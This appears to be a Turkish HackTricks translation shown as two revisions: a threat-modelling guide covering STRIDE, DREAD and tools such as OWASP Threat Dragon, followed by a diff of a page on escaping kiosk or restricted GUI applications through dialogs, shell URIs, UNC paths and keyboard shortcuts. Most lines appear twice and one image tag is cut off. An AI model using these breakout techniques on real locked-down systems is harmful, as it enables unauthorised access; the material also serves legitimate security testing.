1. **Yazılım Geliştirme**: Güvenli Yazılım Geliştirme Yaşam Döngüsü (SSDLC) kapsamında, tehdit modellemesi, geliştirme sürecinin erken aşamalarında **potansiyel zayıf noktaları belirlemeye yardımcı olur**.
2. **Penetrasyon Testi**: Penetrasyon Testi Yürütme Standartı (PTES) çerçevesi, testi gerçekleştirmeden önce sistemin zayıf noktalarını anlamak için **tehdit modellemesini gerektirir**.
1. **Yazılım Geliştirme**: Güvenli Yazılım Geliştirme Yaşam Döngüsü (SSDLC) parçası olarak, tehdit modelleme, geliştirme sürecinin erken aşamalarında **potansiyel zayıflık kaynaklarını belirlemede** yardımcı olur.
2. **Sızma Testi**: Sızma Testi Yürütme Standartı (PTES) çerçevesi, testi gerçekleştirmeden önce sistemin zayıflıklarını anlamak için **tehdit modellemeyi** gerektirir.
### Tehdit Modeli Özet
### Tehdit Modeli Özeti
Bir Tehdit Modeli genellikle bir diyagram, resim veya başvurulan uygulamanın planlanan mimarisini veya mevcut yapısını gösteren başka bir görsel şekilde temsil edilir. Bir **veri akış diyagramına** benzerlik gösterir, ancak temel farkı güvenlik odaklı tasarımında yatar.
Bir Tehdit Modeli genellikle bir diyagram, resim veya uygulamanın planlanmış mimarisini veya mevcut yapısını gösteren görsel bir temsil olarak sunulur. Bir **veri akış diyagramına** benzer, ancak temel farkı güvenlik odaklı tasarımında yatar.
Tehdit modelleri genellikle potansiyel zayıflıkları, riskleri veya engelleri simgeleyen kırmızı renkle işaretlenmiş unsurları içerir. Risk tespit sürecini kolaylaştırmak için, CIA (Gizlilik, Bütünlük, Erişilebilirlik) üçlüsü kullanılır ve birçok tehdit modelleme metodolojisinin temelini oluşturur. STRIDE, en yaygın olanlardan biri olsa da, seçilen metodoloji belirli bağlama ve gereksinimlere bağlı olarak değişebilir.
Tehdit modelleri genellikle potansiyel zayıflıkları, riskleri veya engelleri simgeleyen kırmızı işaretli unsurları içerir. Risk tanımlama sürecini kolaylaştırmak için, CIA (Gizlilik, Bütünlük, Erişilebilirlik) üçlüsü kullanılır ve birçok tehdit modelleme metodolojisinin temelini oluşturur; STRIDE en yaygın olanlarından biridir. Ancak seçilen metodoloji, belirli bağlama ve gereksinimlere bağlı olarak değişebilir.
### CIA Üçlüsü
CIA Üçlüsü, bilgi güvenliği alanında yaygın olarak tanınan bir modeldir ve Gizlilik, Bütünlük ve Erişilebilirlik anlamına gelir. Bu üç temel, tehdit modelleme metodolojileri de dahil olmak üzere birçok güvenlik önlemi ve politikasının temelini oluşturur.
CIA Üçlüsü, bilgi güvenliği alanında geniş kabul gören bir modeldir ve Gizlilik, Bütünlük ve Erişilebilirlik anlamına gelir. Bu üç ilke, tehdit modelleme metodolojileri de dahil olmak üzere birçok güvenlik önlemi ve politikasının temelini oluşturur.
1. **Gizlilik**: Verilerin veya sistemin yetkisiz kişiler tarafından erişilmesini engellemek. Bu, veri ihlallerini önlemek için uygun erişim kontrolleri, şifreleme ve diğer önlemlerin gerektiği güvenliğin merkezi bir yönüdür.
2. **Bütünlük**: Verinin yaşam döngüsü boyunca doğruluk, tutarlılık ve güvenilirlik. Bu prensip, verinin yetkisiz kişiler tarafından değiştirilmesini veya değiştirilmesini engeller. Genellikle kontrol toplamları, karma işlemleri ve diğer veri doğrulama yöntemlerini içerir.
3. **Erişilebilirlik**: Veri ve hizmetlerin yetkili kullanıcılar tarafından ihtiyaç duyulduğunda erişilebilir olmasını sağlar. Bu genellikle kesintilere karşı sistemlerin çalışmasını sağlamak için yedeklilik, hata tolere edilebilirlik ve yüksek erişilebilirlik yapılandırmalarını içerir.
1. **Gizlilik**: Verinin veya sistemin yetkisiz kişiler tarafından erişilmesini engellemek. Bu, veri ihlallerini önlemek için uygun erişim kontrolleri, şifreleme ve diğer önlemleri gerektiren güvenliğin merkezi bir yönüdür.
2. **Bütünlük**: Verinin yaşam döngüsü boyunca doğruluğu, tutarlılığı ve güvenilirliği. Bu ilke, verinin yetkisiz kişiler tarafından değiştirilmemesini veya değiştirilmemesini sağlar. Genellikle, kontrol toplamları, karma işlemleri ve diğer veri doğrulama yöntemlerini içerir.
3. **Erişilebilirlik**: Veri ve hizmetlerin ihtiyaç duyulduğunda yetkili kullanıcılara erişilebilir olmasını sağlar. Bu genellikle sistemlerin kesintilere karşı çalışmasını sağlamak için yedeklilik, hata toleransı ve yüksek erişilebilirlik yapılandırmalarını içerir.
### Tehdit Modelleme Metodolojileri
1. **STRIDE**: Microsoft tarafından geliştirilen STRIDE, **Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service ve Elevation of Privilege** kelimelerinin baş harflerinden oluşan bir kısaltmadır. Her kategori bir tehdit türünü temsil eder ve bu metodoloji, potansiyel tehditleri belirlemek için bir programın veya sistemin tasarım aşamasında yaygın olarak kullanılır.
2. **DREAD**: Bu, Microsoft'un tanımlanan tehditlerin risk değerlendirmesi için kullandığı başka bir metodolojidir. DREAD, **Damage potential, Reproducibility, Exploitability, Affected users ve Discoverability** kelimelerinin baş harflerinden oluşur. Bu faktörlerin her biri puanlanır ve sonuç, belirlenen tehditleri önceliklendirmek için kullanılır.
3. **PASTA** (Attack Simulation and Threat Analysis için Süreç): Bu, yedi adımlı, **risk odaklı** bir metodolojidir. Güvenlik hedeflerini tanımlama ve belirleme, teknik kapsam oluşturma, uygulama ayrıştırma, tehdit analizi, zayıflık analizi ve risk/değerlendirme değerlendirmesini içerir.
4. **Trike**: Bu, varlıkları savunmaya odaklanan bir risk tabanlı metodolojidir. Risk yönetimi perspektifinden başlar ve tehditleri ve zayıflıkları bu bağlamda inceler.
5. **VAST** (Görsel, Çevik ve Basit Tehdit Modelleme): Bu yaklaşım, daha erişilebilir olmayı hedefler ve Çevik geliştirme ortamlarına entegre olur. Diğer metodolojilerden öğeleri birleştirir ve tehditlerin **görsel temsillerine** odaklanır.
6. **OCTAVE** (Operasyonel Kritik Tehdit, Varlık ve Zayıflık Değerlendirmesi): CERT Koordinasyon Merkezi tarafından geliştirilen bu çerçeve, örgütsel risk değerlendirmesine yöneliktir ve belirli sistemler veya yazılımlar yerine odaklanır.
1. **STRIDE**: Microsoft tarafından geliştirilen STRIDE, **Sahtecilik, Bozulma, Reddiye, Bilgi Açıklaması, Hizmet Reddi ve Ayrıcalık Yükseltme** anlamına gelen bir kısaltmadır. Her kategori bir tehdit türünü temsil eder ve bu metodoloji, potansiyel tehditleri belirlemek için bir programın veya sistemin tasarım aşamasında yaygın olarak kullanılır.
2. **DREAD**: Bu, Microsoft'un belirtilen tehditlerin risk değerlendirmesi için kullandığı başka bir metodolojidir. DREAD, **Hasar Potansiyeli, Tekrarlanabilirlik, Sömürülebilirlik, Etkilenen Kullanıcılar ve Keşfedilebilirlik** anlamına gelir. Bu faktörlerin her biri puanlanır ve sonuç, belirlenen tehditleri önceliklendirmek için kullanılır.
3. **PASTA** (Saldırı Simülasyonu ve Tehdit Analizi İçin Süreç): Bu, yedi adımlı, **risk-odaklı** bir metodolojidir. Güvenlik hedeflerini tanımlama ve belirleme, teknik kapsam oluşturma, uygulama ayrıştırma, tehdit analizi, zayıflık analizi ve risk/değerlendirme değerlendirmesini içerir.
4. **Trike**: Bu, varlıkları savunmaya odaklanan bir risk tabanlı metodolojidir. Risk yönetimi perspektifinden başlar ve tehditlere ve zayıflıklara bu bağlamda bakar.
5. **VAST** (Görsel, Çevik ve Basit Tehdit Modelleme): Bu yaklaşım, daha erişilebilir olmayı amaçlar ve Agile geliştirme ortamlarına entegre olur. Diğer metodolojilerden öğeleri birleştirir ve **tehditlerin görsel temsillerine** odaklanır.
6. **OCTAVE** (Operasyonel Kritik Tehdit, Varlık ve Zayıflık Değerlendirmesi): CERT Koordinasyon Merkezi tarafından geliştirilen bu çerçeve, **örgütsel risk değerlendirmesine** odaklanır, belirli sistemler veya yazılımlar yerine.
## Araçlar
Tehdit modellerinin oluşturulması ve yönetimi konusunda yardımcı olabilecek birkaç araç ve yazılım çözümü mevcuttur. İşte düşünebileceğiniz birkaç tanesi.
Tehdit modellerinin oluşturulması ve yönetilmesine yardımcı olabilecek birkaç araç ve yazılım çözümü mevcuttur. Düşünebileceğiniz birkaç tanesi şunlardır.
### [SpiderSuite](https://github.com/3nock/SpiderSuite)
Siber güvenlik profesyonelleri için gelişmiş, çok özellikli, platformlar arası bir GUI web örümceği / tarayıcıdır. Spider Suite, saldırı yüzeyi haritalama ve analizi için kullanılabilir.
Siber güvenlik uzmanları için gelişmiş çapraz platform ve çok özellikli GUI web örümceği / tarayıcı olan Spider Suite, saldırı yüzeyi haritalama ve analizi için kullanılabilir.
**Kullanım**
1. Bir URL seçin ve Tarama yapın
1. Bir URL seçin ve Tarama Yapın
<figure><img src="../.gitbook/assets/threatmodel_spidersuite_1.png" alt=""><figcaption></figcaption></figure>
2. Grafikleri Görüntüle
2. Grafiği Görüntüleyin
<figure><img src="../.gitbook/assets/threatmodel_spidersuite_2.png" alt=""><figcaption></figcaption></figure>
### [OWASP Threat Dragon](https://github.com/OWASP/threat-dragon/releases)
### [OWASP Tehdit Ejderi](https://github.com/OWASP/threat-dragon/releases)
OWASP'den açık kaynaklı bir proje olan Threat Dragon, sistem diyagramlama ve tehdit/mitigasyon otomatik oluşturma için bir kural motoru içeren hem web hem de masaüstü uygulamasıdır.
OWASP'tan açık kaynaklı bir proje olan Tehdit Ejderi, sistem diyagramlamasını ve tehditleri/önlemleri otomatik olarak oluşturmak için bir kural motorunu içeren hem web hem de masaüstü uygulamasıdır.
**Kullanım**
1. Yeni Proje Oluştur
1. Yeni Proje Oluşturun
<figure><img src="../.gitbook/assets/create_new_project_1.jpg" alt=""><figcaption></figcaption></figure>
Bazen şu şekilde görünebilir:
Bazen şöyle görünebilir:
<figure><img src="../.gitbook/assets/1_threatmodel_create_project.jpg" alt=""><figcaption></figcaption></figure>
2. Yeni Proje Başlat
2. Yeni Projeyi Başlatın
<figure><img src="../.gitbook/assets/launch_new_project_2.jpg" alt=""><figcaption></figcaption></figure>
3. Yeni Projeyi Kaydet
3. Yeni Projeyi Kaydedin
<figure><img src="../.gitbook/assets/save_new_project.jpg" alt=""><figcaption></figcaption></figure>
4. Modelinizi Oluşturun
SpiderSuite Crawler gibi araçları kullanarak ilham almak için bir temel model şu şekilde görünebilir
SpiderSuite Tarayıcı gibi araçları kullanarak ilham alabilirsiniz, temel bir model şöyle görünebilir
<figure><img src="../.gitbook/assets/0_basic_threat_model.jpg" alt=""><figcaption></figcaption></figure>
Varlıklar hakkında biraz açıklama:
* Süreç (Web sunucusu veya web işlevi gibi varlık kendisi)
* İşlem (Web sunucusu veya web işlevi gibi varlık kendisi)
* Aktör (Web Sitesi Ziyaretçisi, Kullanıcı veya Yönetici gibi bir Kişi)
* Veri Akış Hattı (Etkileşimin göstergesi)
* Veri Akış Hattı (Etkileşimin Göstergesi)
* Güven Sınırı (Farklı ağ segmentleri veya kapsamları.)
* Depolama (Verilerin depolandığı veritabanı gibi şeyler)
* Depolama (Verilerin depolandığı şeyler, veritabanları gibi)
5. Tehdit Oluştur (Adım 1)
5. Tehdit Oluşturun (Adım 1)
Öncelikle tehdit eklemek istediğiniz katmanı seçmelisiniz
Önce bir tehdit eklemek istediğiniz katmanı seçmelisiniz
<figure><img src="../.gitbook/assets/3_threatmodel_chose-threat-layer.jpg" alt=""><figcaption></figcaption></figure>
Şimdi tehdit oluşturabilirsiniz
Şimdi tehdidi oluşturabilirsiniz
<figure><img src="../
<figure><img src="../.gitbook/assets/4_threatmodel_create-threat.jpg" alt=""><figcaption></figcaption></figure>
Aktör Tehditleri ve İşlem Tehditleri arasında bir fark olduğunu unutmayın. Bir Tehdit eklemek isterseniz yalnızca "Sahtecilik" ve "Reddiye" seçeneklerini seçebileceksiniz. Ancak örneğimizde bir İşlem varlığına bir tehdit ekliyoruz, bu nedenle tehdit oluşturma kutusunda bunu göreceğiz:
<figure><img src="../.gitbook/assets/2_threatmodel_type-option.jpg" alt=""><figcaption></figcaption></figure>
6. Tamam
Artık bitmiş modeliniz böyle görünebilir. Ve işte OWASP Tehdit Ejderi ile basit bir tehdit modeli nasıl oluşturulur.
<figure><img src="../.gitbook/assets/threat_model_finished.jpg" alt=""><figcaption></figcaption></figure>
### [Microsoft Tehdit Modelleme Aracı](https://aka.ms/threatmodelingtool)
Bu, yazılım projelerinin tasarım aşamasında tehditleri bulmaya yardımcı olan Microsoft'tan ücretsiz bir araçtır. STRIDE metodolojisini kullanır ve özellikle Microsoft'un yığınında geliştirme yapanlar için uygundur.
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **tehdit edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunan **dark-web** destekli bir arama motorudur.
WhiteIntel'in asıl amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve **ücretsiz** olarak motorlarını deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}

View file

@ -1,21 +1,34 @@
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahramana öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> ile</strong></summary>
<summary><strong>AWS hacklemeyi sıfırdan kahraman olmaya öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> ile</strong>!</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünleri**](https://peass.creator-spring.com)'ni edinin
* **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın (https://github.com/sponsors/carlospolop)!
* [**Resmi PEASS & HackTricks ürünleri**](https://peass.creator-spring.com) edinin
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)'da **takip edin**.
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
## WhiteIntel
# GUI uygulaması içinde olası eylemleri kontrol edin
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
**Ortak Diyaloglar** dosya kaydetme, dosya açma, yazı tipi seçme, renk seçme gibi seçeneklerdir. Çoğu, **Tam bir Gezgin işlevselliği sunacak**. Bu, şu seçeneklere erişebiliyorsanız Gezgin işlevselliğine erişebileceğiniz anlamına gelir:
[**WhiteIntel**](https://whiteintel.io) **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
WhiteIntel'in asıl amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
---
# GUI uygulaması içinde olası eylemleri kontrol et
**Ortak Diyaloglar** dosya kaydetme, dosya açma, yazı tipi seçme, renk seçme gibi seçeneklerdir... Çoğu, tam bir Gezgin işlevselliği sunacaktır. Bu, şu seçeneklere erişebilirseniz Gezgin işlevlerine erişebileceğiniz anlamına gelir:
* Kapat/Kapat olarak
* Aç/Aç ile
@ -27,7 +40,7 @@ HackTricks'ı desteklemenin diğer yolları:
Şunları kontrol etmelisiniz:
* Dosyaları değiştirme veya yeni dosyalar oluşturma
* Sembolik bağlantı oluşturma
* Sembolik bağlantılar oluşturma
* Kısıtlı alanlara erişim sağlama
* Diğer uygulamaları çalıştırma
@ -52,7 +65,7 @@ _bash, sh, zsh..._ Daha fazlası burada: [https://gtfobins.github.io/](https://g
* **Sembolik bağlantılar**
* **Kısayollar**: CTRL+N (yeni oturum aç), CTRL+R (Komutları Yürüt), CTRL+SHIFT+ESC (Görev Yöneticisi), Windows+E (gezgini aç), CTRL-B, CTRL-I (Favoriler), CTRL-H (Geçmiş), CTRL-L, CTRL-O (Dosya/Aç Diyalogu), CTRL-P (Yazdırma Diyalogu), CTRL-S (Farklı Kaydet)
* Gizli Yönetici menüsü: CTRL-ALT-F8, CTRL-ESC-F9
* **Kabuk URI'leri**: _shell:Yönetici Araçları, shell:Belgeler Kitaplığı, shell:Kütüphaneler shell:Kullanıcı Profilleri, shell:Kişisel, shell:AramaAnaKlasör, shell:Sistemshell:Ağ Yerleri Klasörü, shell:Gönder, shell:KullanıcıProfilleri, shell:Ortak Yönetici Araçları, shell:Bilgisayarım Klasörü, shell:İnternet Klasörü_
* **Kabuk URI'ları**: _shell:Yönetici Araçları, shell:Belgeler Kitaplığı, shell:Kütüphaneler shell:KullanıcıProfilleri, shell:Kişisel, shell:AramaAnaKlasör, shell:Sistemshell:AğYerleriKlasörü, shell:Gönder, shell:KullanıcıProfilleri, shell:Ortak Yönetici Araçları, shell:BilgisayarımKlasörü, shell:İnternetKlasörü_
* **UNC yolları**: Paylaşılan klasörlere bağlanmak için yollar. Yerel makinenin C$'sine bağlanmayı denemelisiniz ("\\\127.0.0.1\c$\Windows\System32")
* **Daha fazla UNC yolu:**
@ -101,7 +114,7 @@ Kayıt defteri düzenleyici: [https://sourceforge.net/projects/uberregedit/](htt
* WINDOWS+F Arama
* SHIFT+F10 İçerik Menüsü
* CTRL+SHIFT+ESC Görev Yöneticisi
* CTRL+ALT+DEL Yeni Windows sürümlerinde başlangıç ekranı
* CTRL+ALT+DEL Yeni Windows sürümlerinde ılış ekranı
* F1 Yardım F3 Arama
* F6 Adres Çubuğu
* F11 İnternet Explorer içinde tam ekranı aç/kapat
@ -112,8 +125,8 @@ Kayıt defteri düzenleyici: [https://sourceforge.net/projects/uberregedit/](htt
* CTRL+S Kaydet CTRL+N Yeni RDP / Citrix
## Kaydırma
* Tüm açık Pencereleri görmek için sol taraftan sağa kaydırın, KIOSK uygulamasını en aza indirerek tüm işletim sistemine doğrudan erişin;
* Sağ taraftan sola kaydırarak Eylem Merkezi'ni açın, KIOSK uygulamasını en aza indirerek tüm işletim sistemine doğrudan erişin;
* Tüm açık Pencereleri görmek için sol taraftan sağa kaydırarak KIOSK uygulamasını küçültün ve doğrudan işletim sistemine erişin;
* Sağ taraftan sola kaydırarak Eylem Merkezi'ni açın, KIOSK uygulamasını küçültün ve doğrudan işletim sistemine erişin;
* Üst kenardan içeri kaydırarak tam ekran modunda açılan bir uygulama için başlık çubuğunu görünür hale getirin;
* Alt kenardan yukarı kaydırarak tam ekran bir uygulamada görev çubuğunu gösterin.
@ -151,7 +164,7 @@ Explorer görünümü elde etmek için bu URL'leri yazın:
## Dosya Uzantılarını Gösterme
Daha fazla bilgi için bu sayfaya bakın: [https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml](https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml)
Daha fazla bilgi için bu sayfayı kontrol edin: [https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml](https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml)
# Tarayıcı Hileleri
@ -171,27 +184,27 @@ Kaynak: https://medium.com/@Rend_/give-me-a-browser-ill-give-you-a-shell-de19811
* Dört veya beş parmakla bir yöne kaydırın: Bir sonraki/önceki Uygulamaya geçmek için
* Beş parmakla ekrana yaklaştırın / Ana düğmeye dokunun / Ekranda alttan yukarı doğru hızlı bir hareketle bir parmakla yukarı kaydırın: Ana ekrana erişmek için
* Beş parmakla ekrana sıkıştırın / Ana düğmeye dokunun / Ekranda hızlı bir şekilde aşağıdan yukarıya doğru bir parmakla kaydırarak Ana ekrana erişin: Ana ekrana erişmek için
* Ekrana alttan sadece 1-2 inç (yavaş) bir parmakla yukarı kaydırın: Dock görünecektir
* Ekranda sadece 1-2 inç (yavaşça) aşağıdan bir parmakla kaydırın: Dock görünecektir
* Ekranda üstten bir parmakla aşağı doğru kaydırın: Bildirimlerinizi görüntülemek için
* Ekranda en üstten bir parmakla aşağı kaydırın: Bildirimlerinizi görmek için
* Ekranın sağ üst köşesinden bir parmakla aşağı doğru kaydırın: iPad Pro'nun kontrol merkezini görmek için
* Ekranda en üst sağ köşeden bir parmakla aşağı kaydırın: iPad Pro'nun kontrol merkezini görmek için
* Ekranda sol kenardan 1-2 inçlik bir parmakla kaydırın: Bugün görünümünü görmek için
* Ekranda sol kenardan 1-2 inç (hızlıca) bir parmakla kaydırın: Bugün görünümünü görmek için
* Ekrandan hızlı bir şekilde sağa veya sola doğru bir parmakla kaydırın: Bir sonraki/önceki Uygulamaya geçmek için
* Ekranda merkezden hızlıca sağa veya sola doğru bir parmakla kaydırın: Bir sonraki/önceki Uygulamaya geçmek için
* Üst sağ köşesindeki On/**Off**/Sleep düğmesini basılı tutun ve **iPad'ın sağ üst köşesindeki kaydırıcıyı** tamamen sağa kaydırın: Kapatmak için
* Üst sağ köşedeki On/**Off**/Sleep düğmesini basılı tutun + **iPad'ın sağ üst köşesindeki** Kaydırarak **kapat** kaydırıcısını tamamen sağa kaydırın: Kapatmak için
* **iPad'ın sağ üst köşesindeki On/**Off**/Sleep düğmesine ve Ana düğmeye birkaç saniye basılı tutun**: Zorla kapatmak için
* **iPad'ın sağ üst köşesindeki** On/**Off**/Sleep düğmesine ve Ana düğmeye birkaç saniye basılı tutun: Zorla kapatmak için
* **iPad'ın sağ üst köşesindeki On/**Off**/Sleep düğmesine ve Ana düğmeye hızlıca basın**: Ekranda sol alt köşede belirecek bir ekran görüntüsü almak için. Her iki düğmeye de aynı anda çok kısa süre basın, birkaç saniye basılı tutarsanız sert bir kapanma gerçekleşir.
* **iPad'ın sağ üst köşesindeki** On/**Off**/Sleep düğmesine ve Ana düğmeye hızlıca basın: Ekranda sol alt köşede belirecek bir ekran görüntüsü almak için. Her iki düğmeye de aynı anda çok kısa süre basın, birkaç saniye basılı tutarsanız zorla kapatma gerçekleşir.
## Kısayollar
Bir iPad klavyeniz veya USB klavye adaptörünüz olmalıdır. Uygulamadan kaçmak için yararlı olabilecek yalnızca kısayollar burada gösterilecektir.
Bir iPad klavyesine veya USB klavye adaptörüne sahip olmalısınız. Uygulamadan kaçmak için yararlı olabilecek yalnızca kısayollar burada gösterilecektir.
| Tuş | Adı |
| --- | ------------ |
@ -211,24 +224,24 @@ Bir iPad klavyeniz veya USB klavye adaptörünüz olmalıdır. Uygulamadan kaçm
Bu kısayollar, iPad'in kullanımına bağlı olarak görsel ayarlar ve ses ayarları içindir.
| Kısayol | Eylem |
| -------- | ------------------------------------------------------------------------------ |
| F1 | Ekranı Karart |
| F2 | Ekranı Parlakla |
| F7 | Bir şarkı geri al |
| F8 | Oynat/Duraklat |
| F9 | Bir şarkıyı atla |
| F10 | Sesi Kapat |
| F11 | Sesi Azalt |
| F12 | Sesi Artır |
| ⌘ Boşluk| Mevcut dillerin listesini görüntüler; birini seçmek için tekrar boşluğa dokunun. |
| ------- | ----------------------------------------------------------------------------- |
| F1 | Ekranı Karart |
| F2 | Ekranı Parlakla |
| F7 | Bir şarkı geriye git |
| F8 | Oynat/Duraklat |
| F9 | Bir şarkı ileri git |
| F10 | Sesi Kapat |
| F11 | Sesi Azalt |
| F12 | Sesi Artır |
| ⌘ Space | Mevcut dillerin listesini görüntüler; birini seçmek için tekrar boşluğa dokunun. |
### iPad gezinme
| Kısayol | Eylem |
| -------------------------------------------------- | ------------------------------------------------------- |
| ⌘H | Ana ekrana git |
| ------------------------------------------------- | ------------------------------------------------------- |
| ⌘H | Ana ekrana git |
| ⌘⇧H (Komut-Shift-H) | Ana ekrana git |
| ⌘ (Boşluk) | Spotlight'ı aç |
| ⌘ (Boşluk) | Spotlight'ı aç |
| ⌘⇥ (Komut-Tab) | Son on kullanılan uygulamaları listeler |
| ⌘\~ | Son Uygulamaya git |
| ⌘⇧3 (Komut-Shift-3) | Ekran görüntüsü al (alt sol köşede kaydetme veya işlem yapma) |
@ -241,23 +254,23 @@ Bu kısayollar, iPad'in kullanımına bağlı olarak görsel ayarlar ve ses ayar
| Escape | Geri düğmesi |
| → (Sağ ok) | Sonraki öğe |
| ← (Sol ok) | Önceki öğe |
| ↑↓ (Yukarı ok, Aşağı ok) | Seçili öğeye aynı anda dokunun |
| ↑↓ (Yukarı ok, Aşağı ok) | Seçili öğeye aynı anda dokun |
| ⌥ ↓ (Seçenek-Aşağı ok) | Aşağı kaydır |
| ⌥↑ (Seçenek-Yukarı ok) | Yukarı kaydır |
| ⌥↑ (Seçenek-Yukarı ok) | Yukarı kaydır |
| ⌥← veya ⌥→ (Seçenek-Sol ok veya Seçenek-Sağ ok) | Sola veya sağa kaydır |
| ^⌥S (Kontrol-Option-S) | VoiceOver konuşmasını aç veya kapat |
| ^⌥S (Kontrol-Option-S) | VoiceOver konuşmasını aç veya kapat |
| ⌘⇧⇥ (Komut-Shift-Tab) | Önceki uygulamaya geç |
| ⌘⇥ (Komut-Tab) | Orijinal uygulamaya geri dön |
| ←+→, sonra Seçenek + ← veya Seçenek+→ | Dock'ta gezinmek |
| ←+→, sonra Seçenek + ← veya Seçenek+→ | Dock'tan geçiş yap |
### Safari kısayolları
| Kısayol | Eylem |
| ----------------------- | ----------------------------------------------- |
| ⌘L (Command-L) | Konumu Aç |
| ⌘T | Yeni bir sekme aç |
| ⌘W | Geçerli sekmei kapat |
| ⌘R | Geçerli sekmei yenile |
| ⌘. | Geçerli sekmenin yüklenmesini durdur |
| ⌘W | Geçerli sekmeyi kapat |
| ⌘R | Geçerli sekmeyi yenile |
| ⌘. | Geçerli sekmeyi yüklemeyi durdur |
| ^⇥ | Sonraki sekmeye geç |
| ^⇧⇥ (Control-Shift-Tab) | Önceki sekmeye git |
| ⌘L | Metin girişi/URL alanını seçerek düzenleme yap |
@ -272,9 +285,9 @@ Bu kısayollar, iPad'in kullanımına bağlı olarak görsel ayarlar ve ses ayar
| -------------------------- | ---------------------------- |
| ⌘L | Konumu Aç |
| ⌘T | Yeni bir sekme aç |
| ⌘W | Geçerli sekmei kapat |
| ⌘R | Geçerli sekmei yenile |
| ⌘. | Geçerli sekmenin yüklenmesini durdur |
| ⌘W | Geçerli sekmeyi kapat |
| ⌘R | Geçerli sekmeyi yenile |
| ⌘. | Geçerli sekmeyi yüklemeyi durdur |
| ⌘⌥F (Command-Option/Alt-F) | Posta kutunuzda arama yap |
# Referanslar
@ -285,16 +298,28 @@ Bu kısayollar, iPad'in kullanımına bağlı olarak görsel ayarlar ve ses ayar
* [http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html](http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) bir **dark-web** destekli arama motoru olup, bir şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize** edilip edilmediğini kontrol etmek için **ücretsiz** işlevsellikler sunar.
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>AWS hackleme konusunda sıfırdan kahraman olmaya kadar öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **💬 [Discord grubuna](https://discord.gg/hRep4RUj7f) veya [telegram grubuna](https://t.me/peass) katılın veya** bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** takip edin.**
* [**Resmi PEASS & HackTricks ürünlerini alın**](https://peass.creator-spring.com)
* [**The PEASS Family'yi keşfedin**](https://opensea.io/collection/the-peass-family), özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu keşfedin
